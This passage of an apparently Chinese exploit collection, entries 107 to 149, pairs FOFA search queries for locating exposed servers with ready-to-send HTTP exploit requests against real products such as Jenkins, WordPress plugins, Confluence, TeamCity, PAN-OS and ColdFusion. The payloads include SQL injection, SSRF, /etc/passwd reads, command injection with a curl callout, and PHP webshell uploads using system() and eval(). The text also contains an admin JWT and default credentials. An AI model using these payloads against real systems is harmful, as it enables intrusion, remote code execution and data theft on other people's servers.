Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


110. GoAnywhere MFT unauthenticated admin account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php

121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328


File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart s200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin console directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Kelixun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

